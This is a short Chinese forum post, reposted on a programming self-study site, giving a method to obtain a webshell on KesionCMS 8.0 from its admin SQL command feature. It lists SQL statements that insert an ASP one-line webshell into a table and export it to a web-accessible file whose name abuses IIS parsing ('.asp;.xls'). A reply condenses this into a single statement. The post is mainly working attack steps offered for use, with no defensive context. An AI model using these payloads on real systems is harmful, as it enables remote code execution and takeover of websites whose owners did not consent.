好久没有发贴了,一直有点忙。
前段时间鬼哥,发了 kesion 的任意下载漏洞 ,关于拿shell 一步代过。其实拿shell还是很简单的。方法多的是。刚刚一个兄弟要我拿个shell ,我就发一种拿shell 方法给大家参考下。
点sql 命令执行。
1.create table 0ldgui (a varchar(50)) 创建一个表\\
2.insert into 0ldgui (a) values ('<%execute request("0ldgui")%>') 插入一句话
3.select * into [a] in 'f:/web/0ldgui.asp;.xls' 'excel 4.0;' from 0ldgui 导出, 在 数据库 备份可以看到绝对路径
很常用的一个 asp sql 拿shell方法
--------------------------------------------------------------------------------
y4q1an:
SELECT '<%execute request("a")%>' into [表名] in '网站路径+导出的名字(1.asa;1.xls)' 'excel 8.0;' from 表名
一句话足矣……
查看更多关于kesionCMS 8.0后台拿shell - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13528